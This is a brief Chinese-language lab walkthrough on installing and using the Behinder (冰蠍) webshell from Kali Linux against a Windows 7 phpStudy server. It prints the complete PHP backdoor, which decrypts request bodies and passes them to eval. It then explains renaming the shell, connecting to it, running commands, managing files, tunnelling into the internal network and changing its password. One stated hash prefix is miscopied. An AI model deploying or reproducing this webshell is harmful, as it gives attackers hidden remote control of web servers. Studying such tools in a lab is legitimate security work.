貓寧~~~
操作系統kali linux
https://github.com/rebeyond/Behinder
https://github.com/rebeyond/Behinder/releases
https://github.com/rebeyond/Behinder/releases/download/Behinder_v3.0_Beta_6/Behinder_v3.0_Beta_6_linux.zip
打開冰蠍客戶端
java -jar /root/Desktop/Behinder_v3.0_Beta_6_linux/Behinder_v3.0_Beta6_linux.jar
kali linux系統IP 10.108.18.98
windows 7系統IP 10.108.18.99
windows 7采用phpstudy啟用wamp
使用server文件夾中的shell.php
<?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //該密鑰為連接密碼32位md5值的前16位,默認連接密碼rebeyond $_SESSION['k']=$key; $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?>
shell.php在C:\phpstudy_pro\WWW下重命名為xiaozhupeiqi.php
http://10.108.18.99/xiaozhupeiqi.php
點擊空白,右鍵新增,輸入URL和默認密碼rebeyond
連接成功
基本信息是一個phpinfo,還有命令執行,虛擬終端,文件管理,其中內網穿透功能可以試試。
rebeyond進行md5加密為e45e329feb5d925ba3f549b17b4b3dde
前16位是45e329feb5d925b
如果想要修改密碼,只需要將自定義密碼md5加密之后的前16位替換一下就OK
例如xiaozhupeiqi,md5加密,620157faf8ab159f0bc80ad0a8f42b68,前16位620157faf8ab159f
可以連接成功
md5加解密可以用這個網站
https://www.cmd5.com/hash.aspx
代理設置127.0.0.1 8081 http,burpsuite proxy的options對應設置,可以通過測試抓取流量
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
除了支持php木馬,還支持asp,aspx,jsp木馬。
over~~~